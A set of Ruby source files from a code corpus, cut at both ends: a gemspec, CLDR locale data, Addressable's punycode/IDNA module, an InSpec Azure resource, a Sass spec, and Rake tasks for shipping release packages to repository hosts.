rand.class == Float
end
| 12.484848 | 26 | 0.618932 |
5dbe002e8c77f7fbd18f89808270db396bf18005 | 1,628 | # frozen_string_literal: true
$LOAD_PATH.push File.expand_path("../lib", __FILE__)
require "magic_lamp/version"
Gem::Specification.new do |s|
s.name = "magic_lamp"
s.version = MagicLamp::VERSION
s.authors = ["Michael Crismali"]
s.email = ["[email protected]"]
s.homepage = "https://github.com/crismali/magic_lamp"
s.summary = "Makes sure your JavaScript tests break when if your templates change."
s.description = "MagicLamp provides an easy way to get your Rails templates into your JavaScript specs."
s.license = "Apache 2.0"
s.files = Dir["{app,config,lib}/**/*", "VERSION", "LICENSE", "README.md"]
s.test_files = Dir["spec/**/*"].reject do |file_path|
[
/\.sqlite3\z/,
/\.sqlite3-journal\z/,
/\.log\z/,
/tmp/,
/\.sass-cache\z/,
%r{spec/dummy/\.}
].any? do |ignored_pattern|
file_path.match(ignored_pattern)
end
end
s.add_dependency "rails", ">= 4.0.0"
s.add_dependency "rake"
s.add_dependency "method_source"
s.add_development_dependency "appraisal"
s.add_development_dependency "bundler", "~> 1.7"
s.add_development_dependency "database_cleaner"
s.add_development_dependency "dotenv-rails"
s.add_development_dependency "fantaskspec"
s.add_development_dependency "pry"
s.add_development_dependency "pry-doc"
s.add_development_dependency "pry-nav"
s.add_development_dependency "rspec-rails"
s.add_development_dependency "rubocop", "~> 0.48.1"
s.add_development_dependency "selenium-webdriver"
s.add_development_dependency "sqlite3"
s.add_development_dependency "teaspoon"
end
| 33.22449 | 106 | 0.69656 |
e286c9722c99938c7f0cc1051ada35677e3b9d2d | 2,181 | #
# a language data file for Ruby/CLDR
#
# Generated by: CLDR::Generator
#
# CLDR version: 1.3
#
# Original file name: common/main/sr_Latn_YU.xml
# Original file revision: 1.11 $
#
# Copyright (C) 2006 Masao Mutoh
#
# This file is distributed under the same license as the Ruby/CLDR.
#
private
def init_data
@hourformat = "+HHmm;-HHmm"
@hoursformat = "{0}/{1}"
@regionformat = "{0}"
@fallbackformat = "{0} ({1})"
@abbreviationfallback = "standard"
@preferenceordering = ""
@singlecountries = "Africa/Bamako America/Godthab America/Santiago America/Guayaquil Asia/Shanghai Asia/Tashkent Asia/Kuala_Lumpur Europe/Madrid Europe/Lisbon Europe/London Pacific/Auckland Pacific/Tahiti"
@exemplarcities = {}
@exemplarcities["Africa/Kinshasa"] = "Kinšasa"
@exemplarcities["Africa/Lubumbashi"] = "Лумумбаши"
@exemplarcities["Antarctica/South_Pole"] = "Južni pol"
@exemplarcities["Asia/Anadyr"] = "Anadir"
@exemplarcities["Asia/Kamchatka"] = "Kamčatka"
@exemplarcities["Asia/Krasnoyarsk"] = "Krasnojarsk"
@exemplarcities["Asia/Shanghai"] = "Šangaj"
@exemplarcities["Asia/Tashkent"] = "Taškent"
@exemplarcities["Europe/Kiev"] = "Kijev"
@exemplarcities["Europe/Moscow"] = "Moskva"
@exemplarcities["Europe/Uzhgorod"] = "Užgorod"
@exemplarcities["Europe/Zaporozhye"] = "Zaporožje"
@long_generics = {}
@long_standards = {}
@long_standards["Europe/Belgrade"] = "Centralno Evropsko Vreme"
@long_daylights = {}
@long_daylights["Europe/Belgrade"] = "Centralno Evropsko Vreme"
@short_generics = {}
@short_standards = {}
@short_standards["Europe/Belgrade"] = "CET"
@short_daylights = {}
@short_daylights["Europe/Belgrade"] = "CET"
end
public
attr_reader :hourformat
attr_reader :hoursformat
attr_reader :regionformat
attr_reader :fallbackformat
attr_reader :abbreviationfallback
attr_reader :preferenceordering
attr_reader :singlecountries
attr_reader :exemplarcities
attr_reader :long_generics
attr_reader :long_standards
attr_reader :long_daylights
attr_reader :short_generics
attr_reader :short_standards
attr_reader :short_daylights
| 33.553846 | 217 | 0.711142 |
7a32a071437798e767b215d4f79bda1c0e8cd985 | 21,359 | # encoding:utf-8
#--
# Copyright (C) Bob Aman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#++
module Addressable
module IDNA
# This module is loosely based on idn_actionmailer by Mick Staugaard,
# the unicode library by Yoshida Masato, and the punycode implementation
# by Kazuhiro Nishiyama. Most of the code was copied verbatim, but
# some reformatting was done, and some translation from C was done.
#
# Without their code to work from as a base, we'd all still be relying
# on the presence of libidn. Which nobody ever seems to have installed.
#
# Original sources:
# http://github.com/staugaard/idn_actionmailer
# http://www.yoshidam.net/Ruby.html#unicode
# http://rubyforge.org/frs/?group_id=2550
UNICODE_TABLE = File.expand_path(
File.join(File.dirname(__FILE__), '../../..', 'data/unicode.data')
)
ACE_PREFIX = "xn--"
UTF8_REGEX = /\A(?:
[\x09\x0A\x0D\x20-\x7E] # ASCII
| [\xC2-\xDF][\x80-\xBF] # non-overlong 2-byte
| \xE0[\xA0-\xBF][\x80-\xBF] # excluding overlongs
| [\xE1-\xEC\xEE\xEF][\x80-\xBF]{2} # straight 3-byte
| \xED[\x80-\x9F][\x80-\xBF] # excluding surrogates
| \xF0[\x90-\xBF][\x80-\xBF]{2} # planes 1-3
| [\xF1-\xF3][\x80-\xBF]{3} # planes 4nil5
| \xF4[\x80-\x8F][\x80-\xBF]{2} # plane 16
)*\z/mnx
UTF8_REGEX_MULTIBYTE = /(?:
[\xC2-\xDF][\x80-\xBF] # non-overlong 2-byte
| \xE0[\xA0-\xBF][\x80-\xBF] # excluding overlongs
| [\xE1-\xEC\xEE\xEF][\x80-\xBF]{2} # straight 3-byte
| \xED[\x80-\x9F][\x80-\xBF] # excluding surrogates
| \xF0[\x90-\xBF][\x80-\xBF]{2} # planes 1-3
| [\xF1-\xF3][\x80-\xBF]{3} # planes 4nil5
| \xF4[\x80-\x8F][\x80-\xBF]{2} # plane 16
)/mnx
# :startdoc:
# Converts from a Unicode internationalized domain name to an ASCII
# domain name as described in RFC 3490.
def self.to_ascii(input)
input = input.to_s unless input.is_a?(String)
input = input.dup
if input.respond_to?(:force_encoding)
input.force_encoding(Encoding::ASCII_8BIT)
end
if input =~ UTF8_REGEX && input =~ UTF8_REGEX_MULTIBYTE
parts = unicode_downcase(input).split('.')
parts.map! do |part|
if part.respond_to?(:force_encoding)
part.force_encoding(Encoding::ASCII_8BIT)
end
if part =~ UTF8_REGEX && part =~ UTF8_REGEX_MULTIBYTE
ACE_PREFIX + punycode_encode(unicode_normalize_kc(part))
else
part
end
end
parts.join('.')
else
input
end
end
# Converts from an ASCII domain name to a Unicode internationalized
# domain name as described in RFC 3490.
def self.to_unicode(input)
input = input.to_s unless input.is_a?(String)
parts = input.split('.')
parts.map! do |part|
if part =~ /^#{ACE_PREFIX}(.+)/
begin
punycode_decode(part[/^#{ACE_PREFIX}(.+)/, 1])
rescue Addressable::IDNA::PunycodeBadInput
# toUnicode is explicitly defined as never-fails by the spec
part
end
else
part
end
end
output = parts.join('.')
if output.respond_to?(:force_encoding)
output.force_encoding(Encoding::UTF_8)
end
output
end
# Unicode normalization form KC.
def self.unicode_normalize_kc(input)
input = input.to_s unless input.is_a?(String)
unpacked = input.unpack("U*")
unpacked =
unicode_compose(unicode_sort_canonical(unicode_decompose(unpacked)))
return unpacked.pack("U*")
end
##
# Unicode aware downcase method.
#
# @api private
# @param [String] input
# The input string.
# @return [String] The downcased result.
def self.unicode_downcase(input)
input = input.to_s unless input.is_a?(String)
unpacked = input.unpack("U*")
unpacked.map! { |codepoint| lookup_unicode_lowercase(codepoint) }
return unpacked.pack("U*")
end
(class <<self; private :unicode_downcase; end)
def self.unicode_compose(unpacked)
unpacked_result = []
length = unpacked.length
return unpacked if length == 0
starter = unpacked[0]
starter_cc = lookup_unicode_combining_class(starter)
starter_cc = 256 if starter_cc != 0
for i in 1...length
ch = unpacked[i]
cc = lookup_unicode_combining_class(ch)
if (starter_cc == 0 &&
(composite = unicode_compose_pair(starter, ch)) != nil)
starter = composite
startercc = lookup_unicode_combining_class(composite)
else
unpacked_result << starter
starter = ch
startercc = cc
end
end
unpacked_result << starter
return unpacked_result
end
(class <<self; private :unicode_compose; end)
def self.unicode_compose_pair(ch_one, ch_two)
if ch_one >= HANGUL_LBASE && ch_one < HANGUL_LBASE + HANGUL_LCOUNT &&
ch_two >= HANGUL_VBASE && ch_two < HANGUL_VBASE + HANGUL_VCOUNT
# Hangul L + V
return HANGUL_SBASE + (
(ch_one - HANGUL_LBASE) * HANGUL_VCOUNT + (ch_two - HANGUL_VBASE)
) * HANGUL_TCOUNT
elsif ch_one >= HANGUL_SBASE &&
ch_one < HANGUL_SBASE + HANGUL_SCOUNT &&
(ch_one - HANGUL_SBASE) % HANGUL_TCOUNT == 0 &&
ch_two >= HANGUL_TBASE && ch_two < HANGUL_TBASE + HANGUL_TCOUNT
# Hangul LV + T
return ch_one + (ch_two - HANGUL_TBASE)
end
p = []
ucs4_to_utf8 = lambda do |ch|
if ch < 128
p << ch
elsif ch < 2048
p << (ch >> 6 | 192)
p << (ch & 63 | 128)
elsif ch < 0x10000
p << (ch >> 12 | 224)
p << (ch >> 6 & 63 | 128)
p << (ch & 63 | 128)
elsif ch < 0x200000
p << (ch >> 18 | 240)
p << (ch >> 12 & 63 | 128)
p << (ch >> 6 & 63 | 128)
p << (ch & 63 | 128)
elsif ch < 0x4000000
p << (ch >> 24 | 248)
p << (ch >> 18 & 63 | 128)
p << (ch >> 12 & 63 | 128)
p << (ch >> 6 & 63 | 128)
p << (ch & 63 | 128)
elsif ch < 0x80000000
p << (ch >> 30 | 252)
p << (ch >> 24 & 63 | 128)
p << (ch >> 18 & 63 | 128)
p << (ch >> 12 & 63 | 128)
p << (ch >> 6 & 63 | 128)
p << (ch & 63 | 128)
end
end
ucs4_to_utf8.call(ch_one)
ucs4_to_utf8.call(ch_two)
return lookup_unicode_composition(p)
end
(class <<self; private :unicode_compose_pair; end)
def self.unicode_sort_canonical(unpacked)
unpacked = unpacked.dup
i = 1
length = unpacked.length
return unpacked if length < 2
while i < length
last = unpacked[i-1]
ch = unpacked[i]
last_cc = lookup_unicode_combining_class(last)
cc = lookup_unicode_combining_class(ch)
if cc != 0 && last_cc != 0 && last_cc > cc
unpacked[i] = last
unpacked[i-1] = ch
i -= 1 if i > 1
else
i += 1
end
end
return unpacked
end
(class <<self; private :unicode_sort_canonical; end)
def self.unicode_decompose(unpacked)
unpacked_result = []
for cp in unpacked
if cp >= HANGUL_SBASE && cp < HANGUL_SBASE + HANGUL_SCOUNT
l, v, t = unicode_decompose_hangul(cp)
unpacked_result << l
unpacked_result << v if v
unpacked_result << t if t
else
dc = lookup_unicode_compatibility(cp)
unless dc
unpacked_result << cp
else
unpacked_result.concat(unicode_decompose(dc.unpack("U*")))
end
end
end
return unpacked_result
end
(class <<self; private :unicode_decompose; end)
def self.unicode_decompose_hangul(codepoint)
sindex = codepoint - HANGUL_SBASE;
if sindex < 0 || sindex >= HANGUL_SCOUNT
l = codepoint
v = t = nil
return l, v, t
end
l = HANGUL_LBASE + sindex / HANGUL_NCOUNT
v = HANGUL_VBASE + (sindex % HANGUL_NCOUNT) / HANGUL_TCOUNT
t = HANGUL_TBASE + sindex % HANGUL_TCOUNT
if t == HANGUL_TBASE
t = nil
end
return l, v, t
end
(class <<self; private :unicode_decompose_hangul; end)
def self.lookup_unicode_combining_class(codepoint)
codepoint_data = UNICODE_DATA[codepoint]
(codepoint_data ?
(codepoint_data[UNICODE_DATA_COMBINING_CLASS] || 0) :
0)
end
(class <<self; private :lookup_unicode_combining_class; end)
def self.lookup_unicode_compatibility(codepoint)
codepoint_data = UNICODE_DATA[codepoint]
(codepoint_data ?
codepoint_data[UNICODE_DATA_COMPATIBILITY] : nil)
end
(class <<self; private :lookup_unicode_compatibility; end)
def self.lookup_unicode_lowercase(codepoint)
codepoint_data = UNICODE_DATA[codepoint]
(codepoint_data ?
(codepoint_data[UNICODE_DATA_LOWERCASE] || codepoint) :
codepoint)
end
(class <<self; private :lookup_unicode_lowercase; end)
def self.lookup_unicode_composition(unpacked)
return COMPOSITION_TABLE[unpacked]
end
(class <<self; private :lookup_unicode_composition; end)
HANGUL_SBASE = 0xac00
HANGUL_LBASE = 0x1100
HANGUL_LCOUNT = 19
HANGUL_VBASE = 0x1161
HANGUL_VCOUNT = 21
HANGUL_TBASE = 0x11a7
HANGUL_TCOUNT = 28
HANGUL_NCOUNT = HANGUL_VCOUNT * HANGUL_TCOUNT # 588
HANGUL_SCOUNT = HANGUL_LCOUNT * HANGUL_NCOUNT # 11172
UNICODE_DATA_COMBINING_CLASS = 0
UNICODE_DATA_EXCLUSION = 1
UNICODE_DATA_CANONICAL = 2
UNICODE_DATA_COMPATIBILITY = 3
UNICODE_DATA_UPPERCASE = 4
UNICODE_DATA_LOWERCASE = 5
UNICODE_DATA_TITLECASE = 6
begin
if defined?(FakeFS)
fakefs_state = FakeFS.activated?
FakeFS.deactivate!
end
# This is a sparse Unicode table. Codepoints without entries are
# assumed to have the value: [0, 0, nil, nil, nil, nil, nil]
UNICODE_DATA = File.open(UNICODE_TABLE, "rb") do |file|
Marshal.load(file.read)
end
ensure
if defined?(FakeFS)
FakeFS.activate! if fakefs_state
end
end
COMPOSITION_TABLE = {}
for codepoint, data in UNICODE_DATA
canonical = data[UNICODE_DATA_CANONICAL]
exclusion = data[UNICODE_DATA_EXCLUSION]
if canonical && exclusion == 0
COMPOSITION_TABLE[canonical.unpack("C*")] = codepoint
end
end
UNICODE_MAX_LENGTH = 256
ACE_MAX_LENGTH = 256
PUNYCODE_BASE = 36
PUNYCODE_TMIN = 1
PUNYCODE_TMAX = 26
PUNYCODE_SKEW = 38
PUNYCODE_DAMP = 700
PUNYCODE_INITIAL_BIAS = 72
PUNYCODE_INITIAL_N = 0x80
PUNYCODE_DELIMITER = 0x2D
PUNYCODE_MAXINT = 1 << 64
PUNYCODE_PRINT_ASCII =
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" +
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" +
" !\"\#$%&'()*+,-./" +
"0123456789:;<=>?" +
"@ABCDEFGHIJKLMNO" +
"PQRSTUVWXYZ[\\]^_" +
"`abcdefghijklmno" +
"pqrstuvwxyz{|}~\n"
# Input is invalid.
class PunycodeBadInput < StandardError; end
# Output would exceed the space provided.
class PunycodeBigOutput < StandardError; end
# Input needs wider integers to process.
class PunycodeOverflow < StandardError; end
def self.punycode_encode(unicode)
unicode = unicode.to_s unless unicode.is_a?(String)
input = unicode.unpack("U*")
output = [0] * (ACE_MAX_LENGTH + 1)
input_length = input.size
output_length = [ACE_MAX_LENGTH]
# Initialize the state
n = PUNYCODE_INITIAL_N
delta = out = 0
max_out = output_length[0]
bias = PUNYCODE_INITIAL_BIAS
# Handle the basic code points:
input_length.times do |j|
if punycode_basic?(input[j])
if max_out - out < 2
raise PunycodeBigOutput,
"Output would exceed the space provided."
end
output[out] = input[j]
out += 1
end
end
h = b = out
# h is the number of code points that have been handled, b is the
# number of basic code points, and out is the number of characters
# that have been output.
if b > 0
output[out] = PUNYCODE_DELIMITER
out += 1
end
# Main encoding loop:
while h < input_length
# All non-basic code points < n have been
# handled already. Find the next larger one:
m = PUNYCODE_MAXINT
input_length.times do |j|
m = input[j] if (n...m) === input[j]
end
# Increase delta enough to advance the decoder's
# <n,i> state to <m,0>, but guard against overflow:
if m - n > (PUNYCODE_MAXINT - delta) / (h + 1)
raise PunycodeOverflow, "Input needs wider integers to process."
end
delta += (m - n) * (h + 1)
n = m
input_length.times do |j|
# Punycode does not need to check whether input[j] is basic:
if input[j] < n
delta += 1
if delta == 0
raise PunycodeOverflow,
"Input needs wider integers to process."
end
end
if input[j] == n
# Represent delta as a generalized variable-length integer:
q = delta; k = PUNYCODE_BASE
while true
if out >= max_out
raise PunycodeBigOutput,
"Output would exceed the space provided."
end
t = (
if k <= bias
PUNYCODE_TMIN
elsif k >= bias + PUNYCODE_TMAX
PUNYCODE_TMAX
else
k - bias
end
)
break if q < t
output[out] =
punycode_encode_digit(t + (q - t) % (PUNYCODE_BASE - t))
out += 1
q = (q - t) / (PUNYCODE_BASE - t)
k += PUNYCODE_BASE
end
output[out] = punycode_encode_digit(q)
out += 1
bias = punycode_adapt(delta, h + 1, h == b)
delta = 0
h += 1
end
end
delta += 1
n += 1
end
output_length[0] = out
outlen = out
outlen.times do |j|
c = output[j]
unless c >= 0 && c <= 127
raise StandardError, "Invalid output char."
end
unless PUNYCODE_PRINT_ASCII[c]
raise PunycodeBadInput, "Input is invalid."
end
end
output[0..outlen].map { |x| x.chr }.join("").sub(/\0+\z/, "")
end
(class <<self; private :punycode_encode; end)
def self.punycode_decode(punycode)
input = []
output = []
if ACE_MAX_LENGTH * 2 < punycode.size
raise PunycodeBigOutput, "Output would exceed the space provided."
end
punycode.each_byte do |c|
unless c >= 0 && c <= 127
raise PunycodeBadInput, "Input is invalid."
end
input.push(c)
end
input_length = input.length
output_length = [UNICODE_MAX_LENGTH]
# Initialize the state
n = PUNYCODE_INITIAL_N
out = i = 0
max_out = output_length[0]
bias = PUNYCODE_INITIAL_BIAS
# Handle the basic code points: Let b be the number of input code
# points before the last delimiter, or 0 if there is none, then
# copy the first b code points to the output.
b = 0
input_length.times do |j|
b = j if punycode_delimiter?(input[j])
end
if b > max_out
raise PunycodeBigOutput, "Output would exceed the space provided."
end
b.times do |j|
unless punycode_basic?(input[j])
raise PunycodeBadInput, "Input is invalid."
end
output[out] = input[j]
out+=1
end
# Main decoding loop: Start just after the last delimiter if any
# basic code points were copied; start at the beginning otherwise.
in_ = b > 0 ? b + 1 : 0
while in_ < input_length
# in_ is the index of the next character to be consumed, and
# out is the number of code points in the output array.
# Decode a generalized variable-length integer into delta,
# which gets added to i. The overflow checking is easier
# if we increase i as we go, then subtract off its starting
# value at the end to obtain delta.
oldi = i; w = 1; k = PUNYCODE_BASE
while true
if in_ >= input_length
raise PunycodeBadInput, "Input is invalid."
end
digit = punycode_decode_digit(input[in_])
in_+=1
if digit >= PUNYCODE_BASE
raise PunycodeBadInput, "Input is invalid."
end
if digit > (PUNYCODE_MAXINT - i) / w
raise PunycodeOverflow, "Input needs wider integers to process."
end
i += digit * w
t = (
if k <= bias
PUNYCODE_TMIN
elsif k >= bias + PUNYCODE_TMAX
PUNYCODE_TMAX
else
k - bias
end
)
break if digit < t
if w > PUNYCODE_MAXINT / (PUNYCODE_BASE - t)
raise PunycodeOverflow, "Input needs wider integers to process."
end
w *= PUNYCODE_BASE - t
k += PUNYCODE_BASE
end
bias = punycode_adapt(i - oldi, out + 1, oldi == 0)
# I was supposed to wrap around from out + 1 to 0,
# incrementing n each time, so we'll fix that now:
if i / (out + 1) > PUNYCODE_MAXINT - n
raise PunycodeOverflow, "Input needs wider integers to process."
end
n += i / (out + 1)
i %= out + 1
# Insert n at position i of the output:
# not needed for Punycode:
# raise PUNYCODE_INVALID_INPUT if decode_digit(n) <= base
if out >= max_out
raise PunycodeBigOutput, "Output would exceed the space provided."
end
#memmove(output + i + 1, output + i, (out - i) * sizeof *output)
output[i + 1, out - i] = output[i, out - i]
output[i] = n
i += 1
out += 1
end
output_length[0] = out
output.pack("U*")
end
(class <<self; private :punycode_decode; end)
def self.punycode_basic?(codepoint)
codepoint < 0x80
end
(class <<self; private :punycode_basic?; end)
def self.punycode_delimiter?(codepoint)
codepoint == PUNYCODE_DELIMITER
end
(class <<self; private :punycode_delimiter?; end)
def self.punycode_encode_digit(d)
d + 22 + 75 * ((d < 26) ? 1 : 0)
end
(class <<self; private :punycode_encode_digit; end)
# Returns the numeric value of a basic codepoint
# (for use in representing integers) in the range 0 to
# base - 1, or PUNYCODE_BASE if codepoint does not represent a value.
def self.punycode_decode_digit(codepoint)
if codepoint - 48 < 10
codepoint - 22
elsif codepoint - 65 < 26
codepoint - 65
elsif codepoint - 97 < 26
codepoint - 97
else
PUNYCODE_BASE
end
end
(class <<self; private :punycode_decode_digit; end)
# Bias adaptation method
def self.punycode_adapt(delta, numpoints, firsttime)
delta = firsttime ? delta / PUNYCODE_DAMP : delta >> 1
# delta >> 1 is a faster way of doing delta / 2
delta += delta / numpoints
difference = PUNYCODE_BASE - PUNYCODE_TMIN
k = 0
while delta > (difference * PUNYCODE_TMAX) / 2
delta /= difference
k += PUNYCODE_BASE
end
k + (difference + 1) * delta / (delta + PUNYCODE_SKEW)
end
(class <<self; private :punycode_adapt; end)
end
# :startdoc:
end
| 31.50295 | 78 | 0.556206 |
11226c8c770a47bc65529ec989f60fa26cd5402e | 370 | require 'mathpack/version'
require 'mathpack/statistics'
require 'mathpack/sample'
require 'mathpack/nonlinear_equations'
require 'mathpack/sle'
require 'mathpack/approximation'
require 'mathpack/integration'
require 'mathpack/io'
require 'mathpack/functions'
require 'mathpack/functional'
require 'mathpack/integral_equations'
require 'mathpack/differential_equations'
| 28.461538 | 41 | 0.837838 |
261565019d456f3a8d4cdb0f9b6598f002bfed65 | 1,362 | require 'azure_generic_resources'
class AzureMigrateProjectDatabases < AzureGenericResources
name 'azure_migrate_project_databases'
desc 'Verifies settings for a collection of Azure Migrate Project Databases for a Azure Migrate Project in a Resource Group'
example <<-EXAMPLE
describe azure_migrate_project_databases(resource_group: 'migrated_vms', project_name: 'zoneA_migrate_project') do
it { should exist }
end
EXAMPLE
def initialize(opts = {})
raise ArgumentError, 'Parameters must be provided in an Hash object.' unless opts.is_a?(Hash)
opts[:resource_provider] = specific_resource_constraint('Microsoft.Migrate/migrateProjects', opts)
opts[:required_parameters] = %i(project_name)
opts[:resource_path] = [opts[:project_name], 'databases'].join('/')
super(opts, true)
return if failed_resource?
populate_filter_table_from_response
end
def to_s
super(AzureMigrateProjectDatabases)
end
private
def populate_table
@resources.each do |resource|
resource = resource.merge(resource[:properties])
assessment_data_hash = resource[:assessmentData].each_with_object(Hash.new { |h, k| h[k] = [] }) do |assessment_data, hash|
assessment_data.each_pair { |key, value| hash[key] << value }
end
@table << resource.merge(assessment_data_hash)
end
end
end
| 34.05 | 129 | 0.736417 |
398f4c40e23034eb8f515e941eea1e1c13b192ee | 146 | require 'mxx_ru/cpp'
MxxRu::Cpp::exe_target {
required_prj 'so_5/prj.rb'
target '_test.bench.so_5.prepared_select'
cpp_source 'main.cpp'
}
| 13.272727 | 42 | 0.732877 |
33e80a07381f5d4219e34d5efab6eaf591db3626 | 1,346 | require "spec_helper"
describe "modular-scale" do
before(:all) do
ParserSupport.parse_file("library/modular-scale")
end
context "called with arguments (1, $value: 2em)" do
it "outputs double the first value from the default scale" do
expect(".one-base-two").to have_rule("font-size: 2.5em")
end
end
context "called with arguments (1, $value: 3em)" do
it "outputs triple the first value from the default scale" do
expect(".one-base-three").to have_rule("font-size: 3.75em")
end
end
context "called with arguments (1, $value: 4em 6em)" do
it "outputs quadruple the first value from the default scale" do
expect(".one-double-value").to have_rule("font-size: 1.024em")
end
end
context "called with arguments (1, $ratio: $golden-ratio)" do
it "output the first value from the golden ratio scale" do
expect(".one-golden-ratio").to have_rule("font-size: 1.618em")
end
end
context "called with argument (2)" do
it "outputs the second value from the default scale" do
expect(".two-base-one").to have_rule("font-size: 1.5625em")
end
end
context "called with arguments (2, $value: 4em 6em)" do
it "outputs sextuple the second value from the default scale" do
expect(".two-double-value").to have_rule("font-size: 3.125em")
end
end
end
| 30.590909 | 68 | 0.677563 |
7ab3c5bccaf3fa7555c3727e2046aa1f3344ce81 | 8,489 | namespace :pl do
desc "Ship mocked rpms to #{Pkg::Config.yum_host}"
task :ship_rpms do
["el", "fedora"].each do |dist|
retry_on_fail(:times => 3) do
pkgs = Dir["pkg/#{dist}/**/*.rpm"].map { |f| "'#{f.gsub("pkg/#{dist}/", "#{Pkg::Config.yum_repo_path}/#{dist}/")}'"}
unless pkgs.empty?
rsync_to("pkg/#{dist}", Pkg::Config.yum_host, Pkg::Config.yum_repo_path)
remote_set_immutable(Pkg::Config.yum_host, pkgs)
end
end if File.directory?("pkg/#{dist}")
end
end
namespace :remote do
# These hacky bits execute a pre-existing rake task on the Pkg::Config.apt_host
# The rake task takes packages in a specific directory and freights them
# to various target yum and apt repositories based on their specific type
# e.g., final vs devel vs PE vs FOSS packages
desc "Update remote rpm repodata on #{Pkg::Config.yum_host}"
task :update_yum_repo do
STDOUT.puts "Really run remote repo update on #{Pkg::Config.yum_host}? [y,n]"
if ask_yes_or_no
remote_ssh_cmd(Pkg::Config.yum_host, 'rake -f /opt/repository/Rakefile mk_repo')
end
end
desc "remote freight packages to repos on #{Pkg::Config.apt_host}"
task :freight do
STDOUT.puts "Really run remote freight command on #{Pkg::Config.apt_host}? [y,n]"
if ask_yes_or_no
override = "OVERRIDE=1" if ENV['OVERRIDE']
remote_ssh_cmd(Pkg::Config.apt_host, "rake -f /opt/repository/Rakefile freight #{override}")
end
end
end
desc "Ship cow-built debs to #{Pkg::Config.apt_host}"
task :ship_debs do
retry_on_fail(:times => 3) do
if File.directory?("pkg/deb")
rsync_to('pkg/deb/', Pkg::Config.apt_host, Pkg::Config.apt_repo_path)
end
end
end
namespace :remote do
end
desc "Update remote ips repository on #{Pkg::Config.ips_host}"
task :update_ips_repo do
rsync_to('pkg/ips/pkgs/', Pkg::Config.ips_host, Pkg::Config.ips_store)
remote_ssh_cmd(Pkg::Config.ips_host, "pkgrecv -s #{Pkg::Config.ips_store}/pkgs/#{Pkg::Config.project}Pkg::Config.#{Pkg::Config.ipsversion}.p5p -d #{Pkg::Config.ips_repo} \\*")
remote_ssh_cmd(Pkg::Config.ips_host, "pkgrepo refresh -s #{Pkg::Config.ips_repo}")
remote_ssh_cmd(Pkg::Config.ips_host, "/usr/sbin/svcadm restart svc:/application/pkg/server")
end if Pkg::Config.build_ips
desc "Upload ips p5p packages to downloads"
task :ship_ips => 'pl:fetch' do
if Dir['pkg/ips/pkgs/**/*'].empty?
STDOUT.puts "There aren't any p5p packages in pkg/ips/pkgs. Maybe something went wrong?"
else
rsync_to('pkg/ips/pkgs/', Pkg::Config.ips_package_host, Pkg::Config.ips_path)
end
end if Pkg::Config.build_ips
# We want to ship a gem only for projects that build gems
if Pkg::Config.build_gem
desc "Ship built gem to rubygems"
task :ship_gem do
# Even if a project builds a gem, if it uses the odd_even or zero-based
# strategies, we only want to ship final gems because otherwise a
# development gem would be preferred over the last final gem
if Pkg::Config.version_strategy !~ /odd_even|zero_based/ || Pkg::Util::Version.is_final?
FileList["pkg/#{Pkg::Config.gem_name}-#{Pkg::Config.gemversion}*.gem"].each do |f|
puts "Shipping gem #{f} to rubygems"
ship_gem(f)
end
else
STDERR.puts "Not shipping development gem using odd_even strategy for the sake of your users."
end
end
end
desc "ship apple dmg to #{Pkg::Config.yum_host}"
task :ship_dmg => 'pl:fetch' do
retry_on_fail(:times => 3) do
rsync_to('pkg/apple/*.dmg', Pkg::Config.yum_host, Pkg::Config.dmg_path)
end
end if Pkg::Config.build_dmg
desc "ship tarball and signature to #{Pkg::Config.tar_host}"
task :ship_tar => 'pl:fetch' do
retry_on_fail(:times => 3) do
rsync_to("pkg/#{Pkg::Config.project}-#{Pkg::Config.version}.tar.gz*", Pkg::Config.tar_host, Pkg::Config.tarball_path)
end
end
desc "UBER ship: ship all the things in pkg"
task :uber_ship => 'pl:fetch' do
if confirm_ship(FileList["pkg/**/*"])
ENV['ANSWER_OVERRIDE'] = 'yes'
Rake::Task["pl:ship_gem"].invoke if Pkg::Config.build_gem
Rake::Task["pl:ship_rpms"].invoke
Rake::Task["pl:ship_debs"].invoke
Rake::Task["pl:ship_dmg"].execute if Pkg::Config.build_dmg
Rake::Task["pl:ship_tar"].execute
Rake::Task["pl:jenkins:ship"].invoke("shipped")
add_shipped_metrics(:pe_version => ENV['PE_VER'], :is_rc => (! Pkg::Util::Version.is_final?)) if Pkg::Config.benchmark
post_shipped_metrics if Pkg::Config.benchmark
else
puts "Ship canceled"
exit
end
end
# It is odd to namespace this ship task under :jenkins, but this task is
# intended to be a component of the jenkins-based build workflow even if it
# doesn't interact with jenkins directly. The :target argument is so that we
# can invoke this task with a subdirectory of the standard distribution
# server path. That way we can separate out built artifacts from
# signed/actually shipped artifacts e.g. $path/shipped/ or $path/artifacts.
namespace :jenkins do
desc "Ship pkg directory contents to distribution server"
task :ship, :target do |t, args|
invoke_task("pl:fetch")
target = args.target || "artifacts"
artifact_dir = "#{Pkg::Config.jenkins_repo_path}/#{Pkg::Config.project}/#{Pkg::Config.ref}/#{target}"
# In order to get a snapshot of what this build looked like at the time
# of shipping, we also generate and ship the params file
#
Pkg::Config.config_to_yaml('pkg')
# Sadly, the packaging repo cannot yet act on its own, without living
# inside of a packaging-repo compatible project. This means in order to
# use the packaging repo for shipping and signing (things that really
# don't require build automation, specifically) we still need the project
# clone itself.
git_bundle('HEAD', 'signing_bundle', 'pkg')
# While we're bundling things, let's also make a git bundle of the
# packaging repo that we're using when we invoke pl:jenkins:ship. We can
# have a reasonable level of confidence, later on, that the git bundle on
# the distribution server was, in fact, the git bundle used to create the
# associated packages. This is because this ship task is automatically
# called upon completion each cell of the pl:jenkins:uber_build, and we
# have --ignore-existing set below. As such, the only git bundle that
# should possibly be on the distribution is the one used to create the
# packages.
# We're bundling the packaging repo because it allows us to keep an
# archive of the packaging source that was used to create the packages,
# so that later on if we need to rebuild an older package to audit it or
# for some other reason we're assured that the new package isn't
# different by virtue of the packaging automation.
if defined?(PACKAGING_ROOT)
packaging_bundle = ''
cd PACKAGING_ROOT do
packaging_bundle = git_bundle('HEAD', 'packaging-bundle')
end
mv(packaging_bundle, 'pkg')
end
retry_on_fail(:times => 3) do
